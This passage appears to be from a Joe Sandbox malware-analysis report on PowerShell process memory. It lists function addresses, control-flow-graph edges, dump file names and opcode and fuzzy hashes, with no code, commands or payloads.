                                                                                                                                control_flow_graph 0 7ffb4b36091e-7ffb4b360995 6 7ffb4b360997-7ffb4b3609a6 0->6 7 7ffb4b3609a9-7ffb4b3609ba 0->7 6->7 10 7ffb4b3609bc-7ffb4b3609c7 7->10 11 7ffb4b3609d7-7ffb4b360a59 7->11 14 7ffb4b360a5f-7ffb4b360a69 11->14 15 7ffb4b360d24-7ffb4b360db3 11->15 16 7ffb4b360a82-7ffb4b360a87 14->16 17 7ffb4b360a6b-7ffb4b360a80 14->17 45 7ffb4b360dba-7ffb4b360dcb 15->45 46 7ffb4b360db5 15->46 20 7ffb4b360cc1-7ffb4b360ccb 16->20 21 7ffb4b360a8d-7ffb4b360a90 16->21 17->16 23 7ffb4b360cdc-7ffb4b360d21 20->23 24 7ffb4b360ccd-7ffb4b360cdb 20->24 25 7ffb4b360a92-7ffb4b360a9b 21->25 26 7ffb4b360aa7-7ffb4b360aab 21->26 23->15 25->26 26->20 31 7ffb4b360ab1-7ffb4b360ae8 26->31 41 7ffb4b360b0c-7ffb4b360b10 31->41 42 7ffb4b360aea-7ffb4b360afb 31->42 41->20 47 7ffb4b360b16-7ffb4b360b1e 41->47 42->41 50 7ffb4b360dd2-7ffb4b360e69 45->50 51 7ffb4b360dcd 45->51 46->45 49 7ffb4b360db7 46->49 53 7ffb4b360b20-7ffb4b360b2a 47->53 54 7ffb4b360b2e 47->54 49->45 64 7ffb4b361140-7ffb4b3611b6 50->64 65 7ffb4b360e6f-7ffb4b360e79 50->65 51->50 56 7ffb4b360dcf 51->56 58 7ffb4b360b2c 53->58 59 7ffb4b360b4a-7ffb4b360b7a 53->59 60 7ffb4b360b33-7ffb4b360b48 54->60 56->50 58->60 59->54 70 7ffb4b360b7c-7ffb4b360b86 59->70 60->59 99 7ffb4b3611b7-7ffb4b3611cf 64->99 67 7ffb4b360e92-7ffb4b360e97 65->67 68 7ffb4b360e7b-7ffb4b360e90 65->68 73 7ffb4b3610dd-7ffb4b3610e7 67->73 74 7ffb4b360e9d-7ffb4b360ea0 67->74 68->67 75 7ffb4b360b9f-7ffb4b360c00 70->75 76 7ffb4b360b88-7ffb4b360b9d 70->76 82 7ffb4b3610f8-7ffb4b36113d 73->82 83 7ffb4b3610e9-7ffb4b3610f7 73->83 80 7ffb4b360ea2-7ffb4b360eab 74->80 81 7ffb4b360eb7-7ffb4b360ebb 74->81 102 7ffb4b360c02-7ffb4b360c13 75->102 103 7ffb4b360c14-7ffb4b360c52 75->103 76->75 80->81 81->73 88 7ffb4b360ec1-7ffb4b360ef8 81->88 82->64 105 7ffb4b360f1c 88->105 106 7ffb4b360efa-7ffb4b360f0d 88->106 112 7ffb4b3611d1 99->112 113 7ffb4b3611d6-7ffb4b3611e7 99->113 102->103 132 7ffb4b360c6b-7ffb4b360c8a 103->132 133 7ffb4b360c54-7ffb4b360c69 103->133 110 7ffb4b360f1e-7ffb4b360f20 105->110 115 7ffb4b360f24-7ffb4b360f29 106->115 124 7ffb4b360f0f-7ffb4b360f1a 106->124 110->73 110->115 112->113 116 7ffb4b3611d3 112->116 117 7ffb4b3611ee-7ffb4b36120a 113->117 118 7ffb4b3611e9 113->118 115->73 120 7ffb4b360f2f-7ffb4b360f3a 115->120 116->113 117->99 123 7ffb4b36120c-7ffb4b361284 117->123 118->117 122 7ffb4b3611eb 118->122 125 7ffb4b360f3c-7ffb4b360f46 120->125 126 7ffb4b360f4a 120->126 122->117 144 7ffb4b36144b-7ffb4b3614dd 123->144 145 7ffb4b36128a-7ffb4b361294 123->145 124->110 129 7ffb4b360f48 125->129 130 7ffb4b360f66-7ffb4b360f76 125->130 131 7ffb4b360f4f-7ffb4b360f64 126->131 129->131 139 7ffb4b360f78-7ffb4b360f81 130->139 140 7ffb4b360f83-7ffb4b360f8c 130->140 131->130 154 7ffb4b360c94-7ffb4b360c9a 132->154 133->132 139->140 140->73 182 7ffb4b3614e0-7ffb4b3614f1 144->182 183 7ffb4b3614df 144->183 149 7ffb4b3612ad-7ffb4b3612b2 145->149 150 7ffb4b361296-7ffb4b3612a3 145->150 152 7ffb4b3613eb-7ffb4b3613f5 149->152 153 7ffb4b3612b8-7ffb4b3612bb 149->153 150->149 161 7ffb4b3612a5-7ffb4b3612ab 150->161 159 7ffb4b3613f7-7ffb4b361403 152->159 160 7ffb4b361404-7ffb4b361448 152->160 157 7ffb4b3612d2-7ffb4b3612d6 153->157 158 7ffb4b3612bd-7ffb4b3612c6 153->158 166 7ffb4b360ca1-7ffb4b360cc0 154->166 157->152 167 7ffb4b3612dc-7ffb4b361313 157->167 158->157 160->144 161->149 180 7ffb4b361337 167->180 181 7ffb4b361315-7ffb4b361335 167->181 184 7ffb4b361339-7ffb4b36133b 180->184 181->184 185 7ffb4b3614f4-7ffb4b3615b1 182->185 186 7ffb4b3614f3 182->186 183->182 184->152 188 7ffb4b361341-7ffb4b36137f 184->188 186->185 200 7ffb4b361381-7ffb4b361396 188->200 201 7ffb4b361398-7ffb4b3613b7 188->201 200->201 206 7ffb4b3613c1-7ffb4b3613c6 201->206 207 7ffb4b3613cd-7ffb4b3613ea 206->207
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                • Opcode ID: 055c4ef21e5520e877b4b95f1dd2d41767261f315c209e48b58ceeac8c923735
                                                                                                                                • Instruction ID: 6336c14eccb9bf4c792bf38653c79ecc15ab22c634a66493da8ddbebb0358d03
                                                                                                                                • Opcode Fuzzy Hash: 055c4ef21e5520e877b4b95f1dd2d41767261f315c209e48b58ceeac8c923735
                                                                                                                                • Instruction Fuzzy Hash: 928216A291DBC60FE766AB3D88562B57FE1EF56210B0841FFD18DCB0A3DD185C4A8352
                                                                                                                                Function 00007FFB4B296DFB Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 209 7ffb4b296dfb-7ffb4b296edf SetProcessWorkingSetSizeEx 216 7ffb4b296ee7-7ffb4b296f0f 209->216 217 7ffb4b296ee1 209->217 217->216
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1527610873.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b290000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProcessSizeWorking
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3584180929-0
                                                                                                                                • Opcode ID: f6d66580fd6cf752bc01144d30f6d66dddb1efb7e6d073f8c51ad4850d9af920
                                                                                                                                • Instruction ID: ba8f3d479829acd3975e0181f7b604cb0c908331337aebe9297eef7f280f09a4
                                                                                                                                • Opcode Fuzzy Hash: f6d66580fd6cf752bc01144d30f6d66dddb1efb7e6d073f8c51ad4850d9af920
                                                                                                                                • Instruction Fuzzy Hash: B4312671A0CB584FD719EF6CD8456F97FE0EB66321F00417FD189C3192DA206906C791
                                                                                                                                Function 00007FFB4B3651BA Relevance: .5, Instructions: 494COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 297 7ffb4b3651ba-7ffb4b3651bf 298 7ffb4b365201-7ffb4b365244 297->298 299 7ffb4b3651c1-7ffb4b3651d9 297->299 307 7ffb4b3654ac-7ffb4b36556b 298->307 308 7ffb4b36524a-7ffb4b365254 298->308 301 7ffb4b36515c-7ffb4b365164 299->301 302 7ffb4b3651db-7ffb4b3651fa 299->302 305 7ffb4b365170-7ffb4b3651b0 301->305 306 7ffb4b365166-7ffb4b36516f 301->306 302->298 305->297 310 7ffb4b36526d-7ffb4b365272 308->310 311 7ffb4b365256-7ffb4b365263 308->311 314 7ffb4b365450-7ffb4b36545a 310->314 315 7ffb4b365278-7ffb4b36527b 310->315 311->310 319 7ffb4b365265-7ffb4b36526b 311->319 317 7ffb4b36545c-7ffb4b365468 314->317 318 7ffb4b365469-7ffb4b3654a9 314->318 320 7ffb4b365292 315->320 321 7ffb4b36527d-7ffb4b365290 315->321 318->307 319->310 326 7ffb4b365294-7ffb4b365296 320->326 321->326 326->314 327 7ffb4b36529c-7ffb4b3652d0 326->327 340 7ffb4b3652d2-7ffb4b3652e5 327->340 341 7ffb4b3652e7 327->341 343 7ffb4b3652e9-7ffb4b3652eb 340->343 341->343 343->314 345 7ffb4b3652f1-7ffb4b3652f9 343->345 345->307 346 7ffb4b3652ff-7ffb4b365309 345->346 348 7ffb4b36530b-7ffb4b365323 346->348 349 7ffb4b365325-7ffb4b365335 346->349 348->349 349->314 353 7ffb4b36533b-7ffb4b36536c 349->353 353->314 359 7ffb4b365372-7ffb4b36539e 353->359 364 7ffb4b3653a0-7ffb4b3653c6 359->364 365 7ffb4b3653c9-7ffb4b3653cd 359->365 364->365 365->314 366 7ffb4b3653d3-7ffb4b3653db 365->366 368 7ffb4b3653eb 366->368 369 7ffb4b3653dd-7ffb4b3653e7 366->369 372 7ffb4b3653f0-7ffb4b365405 368->372 370 7ffb4b365407-7ffb4b365426 369->370 371 7ffb4b3653e9 369->371 376 7ffb4b365430-7ffb4b365436 370->376 371->372 372->370 377 7ffb4b36543d-7ffb4b36544f 376->377
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c9a93c3fa6243ba583504e2b43257301d0be99748adb0d831f711b7fc296d6ba
                                                                                                                                • Instruction ID: 929eb4b96671530313427a81201e26f87c4e8f45d54d2d9ab93304ffc1064687
                                                                                                                                • Opcode Fuzzy Hash: c9a93c3fa6243ba583504e2b43257301d0be99748adb0d831f711b7fc296d6ba
                                                                                                                                • Instruction Fuzzy Hash: 35D176B2A1DA8D0FE7A6EF7DC8156B97BD1EF65314B1800FED54CC70A3D918A8058391
                                                                                                                                Function 00007FFB4B361E8A Relevance: .4, Instructions: 412COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 452 7ffb4b361e8a-7ffb4b361ebb 456 7ffb4b361ec2-7ffb4b361ed3 452->456 457 7ffb4b361ebd 452->457 459 7ffb4b361eda-7ffb4b361eeb 456->459 460 7ffb4b361ed5 456->460 457->456 458 7ffb4b361ebf 457->458 458->456 462 7ffb4b361ef2-7ffb4b361f7f 459->462 463 7ffb4b361eed 459->463 460->459 461 7ffb4b361ed7 460->461 461->459 468 7ffb4b362140-7ffb4b3621f5 462->468 469 7ffb4b361f85-7ffb4b361f8f 462->469 463->462 464 7ffb4b361eef 463->464 464->462 470 7ffb4b361f91-7ffb4b361fa1 469->470 471 7ffb4b361fa8-7ffb4b361fac 469->471 476 7ffb4b361fc0 470->476 477 7ffb4b361fa3-7ffb4b361fa6 470->477 474 7ffb4b361fb2-7ffb4b361fb5 471->474 475 7ffb4b3620e8-7ffb4b3620f2 471->475 478 7ffb4b361fcc-7ffb4b361fd0 474->478 479 7ffb4b361fb7-7ffb4b361fbe 474->479 480 7ffb4b3620ff-7ffb4b36213d 475->480 481 7ffb4b3620f4-7ffb4b3620fe 475->481 476->478 477->471 478->475 485 7ffb4b361fd6-7ffb4b36200d 478->485 479->476 480->468 497 7ffb4b36200f-7ffb4b36202f 485->497 498 7ffb4b362031 485->498 499 7ffb4b362033-7ffb4b362035 497->499 498->499 499->475 502 7ffb4b36203b-7ffb4b362075 499->502 509 7ffb4b36208e-7ffb4b3620be 502->509 510 7ffb4b362077-7ffb4b362084 502->510 517 7ffb4b3620c0-7ffb4b3620cc 509->517 510->509 513 7ffb4b362086-7ffb4b36208c 510->513 513->509 518 7ffb4b3620d3-7ffb4b3620e7 517->518
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0351d94f6ccce686e82b6be59b7063787231af303218162b85512055b65ac4f8
                                                                                                                                • Instruction ID: 6b7912ceb2d493f317293d10753e23dd448c5c8f55180812f32728d0b5c784ec
                                                                                                                                • Opcode Fuzzy Hash: 0351d94f6ccce686e82b6be59b7063787231af303218162b85512055b65ac4f8
                                                                                                                                • Instruction Fuzzy Hash: F4C135A190EA8A1FE766EE7D8C542A57FE0EF56310F0541FFD58CCB0A3DA185849C391
                                                                                                                                Function 00007FFB4B360AFE Relevance: .2, Instructions: 200COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 519 7ffb4b360afe-7ffb4b360b10 521 7ffb4b360cc1-7ffb4b360ccb 519->521 522 7ffb4b360b16-7ffb4b360b1e 519->522 525 7ffb4b360cdc-7ffb4b360db3 521->525 526 7ffb4b360ccd-7ffb4b360cdb 521->526 523 7ffb4b360b20-7ffb4b360b2a 522->523 524 7ffb4b360b2e 522->524 527 7ffb4b360b2c 523->527 528 7ffb4b360b4a-7ffb4b360b7a 523->528 530 7ffb4b360b33-7ffb4b360b48 524->530 561 7ffb4b360dba-7ffb4b360dcb 525->561 562 7ffb4b360db5 525->562 527->530 528->524 536 7ffb4b360b7c-7ffb4b360b86 528->536 530->528 538 7ffb4b360b9f-7ffb4b360c00 536->538 539 7ffb4b360b88-7ffb4b360b9d 536->539 551 7ffb4b360c02-7ffb4b360c13 538->551 552 7ffb4b360c14-7ffb4b360c52 538->552 539->538 551->552 563 7ffb4b360c6b-7ffb4b360c9a 552->563 564 7ffb4b360c54-7ffb4b360c69 552->564 566 7ffb4b360dd2-7ffb4b360e69 561->566 567 7ffb4b360dcd 561->567 562->561 565 7ffb4b360db7 562->565 585 7ffb4b360ca1-7ffb4b360cc0 563->585 564->563 565->561 576 7ffb4b361140-7ffb4b3611b6 566->576 577 7ffb4b360e6f-7ffb4b360e79 566->577 567->566 571 7ffb4b360dcf 567->571 571->566 604 7ffb4b3611b7-7ffb4b3611cf 576->604 579 7ffb4b360e92-7ffb4b360e97 577->579 580 7ffb4b360e7b-7ffb4b360e90 577->580 583 7ffb4b3610dd-7ffb4b3610e7 579->583 584 7ffb4b360e9d-7ffb4b360ea0 579->584 580->579 589 7ffb4b3610f8-7ffb4b36113d 583->589 590 7ffb4b3610e9-7ffb4b3610f7 583->590 587 7ffb4b360ea2-7ffb4b360eab 584->587 588 7ffb4b360eb7-7ffb4b360ebb 584->588 587->588 588->583 595 7ffb4b360ec1-7ffb4b360ef8 588->595 589->576 607 7ffb4b360f1c 595->607 608 7ffb4b360efa-7ffb4b360f0d 595->608 611 7ffb4b3611d1 604->611 612 7ffb4b3611d6-7ffb4b3611e7 604->612 610 7ffb4b360f1e-7ffb4b360f20 607->610 614 7ffb4b360f24-7ffb4b360f29 608->614 622 7ffb4b360f0f-7ffb4b360f1a 608->622 610->583 610->614 611->612 615 7ffb4b3611d3 611->615 616 7ffb4b3611ee-7ffb4b36120a 612->616 617 7ffb4b3611e9 612->617 614->583 619 7ffb4b360f2f-7ffb4b360f3a 614->619 615->612 616->604 621 7ffb4b36120c-7ffb4b361284 616->621 617->616 620 7ffb4b3611eb 617->620 623 7ffb4b360f3c-7ffb4b360f46 619->623 624 7ffb4b360f4a 619->624 620->616 636 7ffb4b36144b-7ffb4b3614dd 621->636 637 7ffb4b36128a-7ffb4b361294 621->637 622->610 626 7ffb4b360f48 623->626 627 7ffb4b360f66-7ffb4b360f76 623->627 628 7ffb4b360f4f-7ffb4b360f64 624->628 626->628 632 7ffb4b360f78-7ffb4b360f81 627->632 633 7ffb4b360f83-7ffb4b360f8c 627->633 628->627 632->633 633->583 670 7ffb4b3614e0-7ffb4b3614f1 636->670 671 7ffb4b3614df 636->671 640 7ffb4b3612ad-7ffb4b3612b2 637->640 641 7ffb4b361296-7ffb4b3612a3 637->641 643 7ffb4b3613eb-7ffb4b3613f5 640->643 644 7ffb4b3612b8-7ffb4b3612bb 640->644 641->640 651 7ffb4b3612a5-7ffb4b3612ab 641->651 649 7ffb4b3613f7-7ffb4b361403 643->649 650 7ffb4b361404-7ffb4b361448 643->650 647 7ffb4b3612d2-7ffb4b3612d6 644->647 648 7ffb4b3612bd-7ffb4b3612c6 644->648 647->643 656 7ffb4b3612dc-7ffb4b361313 647->656 648->647 650->636 651->640 668 7ffb4b361337 656->668 669 7ffb4b361315-7ffb4b361335 656->669 672 7ffb4b361339-7ffb4b36133b 668->672 669->672 673 7ffb4b3614f4-7ffb4b3615b1 670->673 674 7ffb4b3614f3 670->674 671->670 672->643 676 7ffb4b361341-7ffb4b36137f 672->676 674->673 688 7ffb4b361381-7ffb4b361396 676->688 689 7ffb4b361398-7ffb4b3613c6 676->689 688->689 695 7ffb4b3613cd-7ffb4b3613ea 689->695
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 380ebea329f492668ecc6236eda4433881b7fe64d802b3b161ce98afdd689ca2
                                                                                                                                • Instruction ID: 0445b6106de98cae1f74908918ff91a7ea602b1c0243551a812d3e528f00e8fb
                                                                                                                                • Opcode Fuzzy Hash: 380ebea329f492668ecc6236eda4433881b7fe64d802b3b161ce98afdd689ca2
                                                                                                                                • Instruction Fuzzy Hash: 2F513BB2A0DA854FE3A5EF3DC49627477C2EF95315B1481BED18DC71A2ED289C468381
                                                                                                                                Function 00007FFB4B360F98 Relevance: .1, Instructions: 143COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 697 7ffb4b360f98-7ffb4b360fa5 698 7ffb4b360fbe-7ffb4b36101f 697->698 699 7ffb4b360fa7-7ffb4b360fbd 697->699 706 7ffb4b361021-7ffb4b36102f 698->706 707 7ffb4b361033-7ffb4b361070 698->707 699->698 706->707 710 7ffb4b361031-7ffb4b361032 706->710 714 7ffb4b361072-7ffb4b361087 707->714 715 7ffb4b361089-7ffb4b3610b7 707->715 710->707 714->715 721 7ffb4b3610be-7ffb4b3610dc 715->721
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5a023aca343853d9d26fa2f2047d55adc35cf12ae90648b290b16b6bac674dd9
                                                                                                                                • Instruction ID: 15513f073244d0faef1600aa83dd0db843010d1882989143c105e4140b1bf826
                                                                                                                                • Opcode Fuzzy Hash: 5a023aca343853d9d26fa2f2047d55adc35cf12ae90648b290b16b6bac674dd9
                                                                                                                                • Instruction Fuzzy Hash: D94104B2E0DFC60FE7A9EE3D84522B4AAD1EF95350B1840BED18DC71A2DD28AC458741
                                                                                                                                Function 00007FFB4B3628BD Relevance: .1, Instructions: 138COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 723 7ffb4b3628bd-7ffb4b362924 729 7ffb4b36292b-7ffb4b362939 723->729 731 7ffb4b362941 729->731 732 7ffb4b36293b 729->732 733 7ffb4b362943 731->733 734 7ffb4b362945-7ffb4b362990 731->734 732->731 733->734 736 7ffb4b362992-7ffb4b3629ba 734->736 737 7ffb4b3629bb-7ffb4b3629fb 734->737 736->737
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 77e842aff67eca295ec5447d57cc93aec49ac9b43158e075d5dab9700b706275
                                                                                                                                • Instruction ID: a65b745b6b84071308e42c7463e8a6b0eb8b208dfb49eb2647de56c3c741f27a
                                                                                                                                • Opcode Fuzzy Hash: 77e842aff67eca295ec5447d57cc93aec49ac9b43158e075d5dab9700b706275
                                                                                                                                • Instruction Fuzzy Hash: D34107A290E7C54FE767AF798C661657FE19F53214B0E44FED0C88B0E3D8191805C722
                                                                                                                                Function 00007FFB4B361FC4 Relevance: .1, Instructions: 122COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 87255c43b224f2d2f60e5a2b73c7eaa41529d578214778f80b87741bd6933cc0
                                                                                                                                • Instruction ID: dba5c200ebc049cbc497952bace80a631c8f137280945a1060655ae73fe0bcd9
                                                                                                                                • Opcode Fuzzy Hash: 87255c43b224f2d2f60e5a2b73c7eaa41529d578214778f80b87741bd6933cc0
                                                                                                                                • Instruction Fuzzy Hash: 0E31E6E2E0EA8B1BFBA9EE7D99653B856C1EF45250F0440BDD68DC71E3DD2C28418291
                                                                                                                                Function 00007FFB4B3612CA Relevance: .1, Instructions: 117COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 790 7ffb4b3612ca-7ffb4b3612d6 792 7ffb4b3612dc-7ffb4b361313 790->792 793 7ffb4b3613eb-7ffb4b3613f5 790->793 803 7ffb4b361337 792->803 804 7ffb4b361315-7ffb4b361335 792->804 795 7ffb4b3613f7-7ffb4b361403 793->795 796 7ffb4b361404-7ffb4b3614dd 793->796 827 7ffb4b3614e0-7ffb4b3614f1 796->827 828 7ffb4b3614df 796->828 805 7ffb4b361339-7ffb4b36133b 803->805 804->805 805->793 808 7ffb4b361341-7ffb4b36137f 805->808 819 7ffb4b361381-7ffb4b361396 808->819 820 7ffb4b361398-7ffb4b3613b7 808->820 819->820 831 7ffb4b3613c1-7ffb4b3613c6 820->831 829 7ffb4b3614f4-7ffb4b3615b1 827->829 830 7ffb4b3614f3 827->830 828->827 830->829 835 7ffb4b3613cd-7ffb4b3613ea 831->835
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a674c0d7a0dd594b2e3c6060c0cc0ce0134cf0ea7b0046a5ce594d28f36ebb21
                                                                                                                                • Instruction ID: f49c7ef2ee95e2d63c796ef98c6c9c620feadf2dbaa448e633017e624c20aeb2
                                                                                                                                • Opcode Fuzzy Hash: a674c0d7a0dd594b2e3c6060c0cc0ce0134cf0ea7b0046a5ce594d28f36ebb21
                                                                                                                                • Instruction Fuzzy Hash: 4A3104E2E0EEC64BF3B9AA7E89A52B866C1AF45340F1840BDD68EC25E3DC082C414351
                                                                                                                                Function 00007FFB4B361861 Relevance: .0, Instructions: 20COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 845 7ffb4b361861-7ffb4b36186c 847 7ffb4b361873-7ffb4b361887 845->847
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f55ec5a7194605f0f1a39b50463e806b2e6c744508887360ad7789c331440d2a
                                                                                                                                • Instruction ID: 23a70a94aca53d9772e4c3c0223fb4591521800b62b36e3518dce6e975264049
                                                                                                                                • Opcode Fuzzy Hash: f55ec5a7194605f0f1a39b50463e806b2e6c744508887360ad7789c331440d2a
                                                                                                                                • Instruction Fuzzy Hash: 02D01271A0891D8E9B41EB68E4051EDF7E1FB5C226B1001B7D51CD3511DA3594914790

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FFB4B3514B3 Relevance: .5, Instructions: 534COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e3ca97ac774005e1ed268be6fae046f7c3fb7837225f34405648953ee5d6cd81
                                                                                                                                • Instruction ID: 6e9e883327d724412efdbc2c5ccacc31ed811bbe02a577c2fbece70c1182d482
                                                                                                                                • Opcode Fuzzy Hash: e3ca97ac774005e1ed268be6fae046f7c3fb7837225f34405648953ee5d6cd81
                                                                                                                                • Instruction Fuzzy Hash: 86F18AA290DF861FE3A6AE3D8855AB57FD1EF46214B1841FFD18DC31A3CD18AC068391
                                                                                                                                Function 00007FFB4B3519E3 Relevance: .3, Instructions: 319COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 093868a592d3dceb33b3059d25fad72e863ff6d591b4f8d0bcceab0e8ed9353a
                                                                                                                                • Instruction ID: 92abe03c8cbb675e905a8814e9d2664d4ac739cc777d4c4b981e08f1765df28c
                                                                                                                                • Opcode Fuzzy Hash: 093868a592d3dceb33b3059d25fad72e863ff6d591b4f8d0bcceab0e8ed9353a
                                                                                                                                • Instruction Fuzzy Hash: 5AA16AB2A1DE864FE799EE3DC45167877D2EF84315B0840BED18DC3193ED18AC568382
                                                                                                                                Function 00007FFB4B350C4E Relevance: .3, Instructions: 278COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e255134ce0ae244f3cb84a0e4c301d05d3478d693c6e0d4443161a38904fd887
                                                                                                                                • Instruction ID: 61f41fdf24aedbc14d614ac88ef8407f60aa2da6246b9ef54c782abea51a6ba4
                                                                                                                                • Opcode Fuzzy Hash: e255134ce0ae244f3cb84a0e4c301d05d3478d693c6e0d4443161a38904fd887
